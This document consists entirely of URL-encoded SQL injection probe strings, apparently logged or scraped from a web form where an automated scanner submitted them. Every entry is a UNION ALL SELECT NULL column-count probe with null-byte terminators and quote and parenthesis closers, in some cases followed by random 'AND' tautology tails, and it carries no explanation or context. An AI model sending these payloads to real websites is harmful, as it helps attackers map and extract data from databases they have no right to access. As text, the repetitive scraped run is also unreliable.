1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27iNHn%27%3D%27iNHn 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27dplo%27%3D%27dplo 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27GKoe%27%3D%27GKoe 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27cPdP%27%3D%27cPdP 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27vJRo%27%3D%27vJRo 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27spQS%27%3D%27spQS 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27qYtJ%27%3D%27qYtJ 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27MeQx%27%3D%27MeQx 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27QDcU%27%3D%27QDcU 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27eTou%27%3D%27eTou 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27wgbS%27%3D%27wgbS 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27QsRq%27%3D%27QsRq 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27sJQr%27%3D%27sJQr 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27ZoZI%27%3D%27ZoZI 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27FcGi%27%3D%27FcGi 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27oCAZ%27%3D%27oCAZ 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27IEWx%27%3D%27IEWx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27yyDl%27%3D%27yyDl 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27TdPS%27%3D%27TdPS 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27GBHX%27%3D%27GBHX 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27rJUg%27%3D%27rJUg 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Gasy%27%3D%27Gasy 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27RlFr%27%3D%27RlFr 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27OpSz%27%3D%27OpSz 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27XmYa%27%3D%27XmYa 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27tJIG%27%3D%27tJIG 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27scRI%27%3D%27scRI 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27dMzb%27%3D%27dMzb 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27YaxQ%27%3D%27YaxQ 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27mrkh%27%3D%27mrkh 